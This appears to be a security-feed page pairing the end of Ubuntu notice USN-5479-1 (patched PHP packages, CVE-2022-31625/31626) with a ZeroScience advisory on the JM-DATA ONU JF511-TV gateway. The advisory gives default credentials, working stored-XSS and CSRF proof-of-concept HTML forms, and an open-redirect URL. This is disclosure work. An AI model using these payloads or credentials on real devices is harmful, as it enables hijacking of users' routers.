  libapache2-mod-php8.1           8.1.2-1ubuntu2.1  
  php8.1-cgi                      8.1.2-1ubuntu2.1  
  php8.1-cli                      8.1.2-1ubuntu2.1  
  php8.1-fpm                      8.1.2-1ubuntu2.1  
  php8.1-mysql                    8.1.2-1ubuntu2.1  
  php8.1-pgsql                    8.1.2-1ubuntu2.1

Ubuntu 21.10:  
  libapache2-mod-php8.0           8.0.8-1ubuntu0.4  
  php8.0-cgi                      8.0.8-1ubuntu0.4  
  php8.0-cli                      8.0.8-1ubuntu0.4  
  php8.0-fpm                      8.0.8-1ubuntu0.4  
  php8.0-mysql                    8.0.8-1ubuntu0.4  
  php8.0-pgsql                    8.0.8-1ubuntu0.4

Ubuntu 20.04 LTS:  
  libapache2-mod-php7.4           7.4.3-4ubuntu2.12  
  php7.4-cgi                      7.4.3-4ubuntu2.12  
  php7.4-cli                      7.4.3-4ubuntu2.12  
  php7.4-fpm                      7.4.3-4ubuntu2.12  
  php7.4-mysql                    7.4.3-4ubuntu2.12  
  php7.4-pgsql                    7.4.3-4ubuntu2.12

Ubuntu 18.04 LTS:  
  libapache2-mod-php7.2           7.2.24-0ubuntu0.18.04.12  
  php7.2-cgi                      7.2.24-0ubuntu0.18.04.12  
  php7.2-cli                      7.2.24-0ubuntu0.18.04.12  
  php7.2-fpm                      7.2.24-0ubuntu0.18.04.12  
  php7.2-mysql                    7.2.24-0ubuntu0.18.04.12  
  php7.2-pgsql                    7.2.24-0ubuntu0.18.04.12

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5479-1  
  CVE-2022-31625, CVE-2022-31626

Package Information:  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.1  
  https://launchpad.net/ubuntu/+source/php8.0/8.0.8-1ubuntu0.4  
  https://launchpad.net/ubuntu/+source/php7.4/7.4.3-4ubuntu2.12  
  https://launchpad.net/ubuntu/+source/php7.2/7.2.24-0ubuntu0.18.04.12

Ubuntu Security Notice USN-5479-1

JM-DATA ONU JF511-TV versions 1.0.67, 1.0.62, and 1.0.55 suffer from cross site request forgery, persistent cross site scripting, default credential, and open redirection vulnerabilities.

  
JM-DATA ONU JF511-TV Multiple Remote Vulnerabilities

Vendor: JM-DATA GmbH  
Product web page: https://www.jm-data.at  
Affected version: 1.0.67  
                  1.0.62  
                  1.0.55

Summary: This ONU is the perfect GEPON home and business gateway.  
It is an all-rounder in perfection. It can BRIDGE/NAT/RIP ROUTEND  
and COMBINED.

Desc: The device suffers from multiple vulnerabilities including:  
Default Credentials, CSRF, Authenticated Stored XSS and Open Redirect.

Tested on: Boa/0.93.15

Vulnerability discovered by Neurogenesia  
                            @zeroscience

Advisory ID: ZSL-2022-5708  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5708.php

24.04.2022

--

Default credentials:  
--------------------  
user:user

Stored XSS / HTML Injection:  
----------------------------  
<html>  
  <body>  
    <form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">  
      <input type="hidden" name="url" value="'><script>alert(document.cookie)</script>' />  
      <input type="hidden" name="action" value="ad" />  
      <input type="hidden" name="submit-url" value="/secu_urlfilter_cfg_en.asp" />  
      <input type="submit" value="Go" />  
    </form>  
  </body>  
</html>

CSRF (delete IP entry filter):  
------------------------------  
<html>  
  <body>  
    <form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">  
      <input type="hidden" name="bcdata" value="ld3:idxi0eee" />  
      <input type="hidden" name="action" value="rm" />  
      <input type="hidden" name="submit-url" value="/secu_urlfilter_cfg_en.asp" />  
      <input type="submit" value="Go" />  
    </form>

    <form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">  
      <input type="hidden" name="urlfilterEnble" value="off" />  
      <input type="hidden" name="action" value="rm" />  
      <input type="hidden" name="bcdata" value="ld3:idxi0eed3:idxi1eee" />  
      <input type="hidden" name="submit-url" value="https://192.168.1.2:8443/secu_urlfilter_cfg_en.asp" />  
      <input type="submit" value="Go" />  
    </form>  
  </body>  
</html>

Open Redirect:  
--------------  
https://192.168.1.2:8443/boaform/formWirelessTbl?submit-url=https://zeroscience.mk

common.js:  
----------  
/*  
 * isCharUnsafe - test a character whether is unsafe  
 * @c: character to test  
 */  
function isCharUnsafe(c)  
{  
  var unsafeString = "\"\\`\+\,='\t";

  return unsafeString.indexOf(c) != -1  
    || c.charCodeAt(0) <= 32  
    || c.charCodeAt(0) >= 123;  
}

/*  
 * isIncludeInvalidChar - test a string whether includes invalid characters  
 * @s: string to test  
 */  
function isIncludeInvalidChar(s)  
{  
  var i;

  for (i = 0; i < s.length; i++) {  
    if (isCharUnsafe(s.charAt(i)) == true)  
      return true;  
  }

  return false;  
}

Tag

#php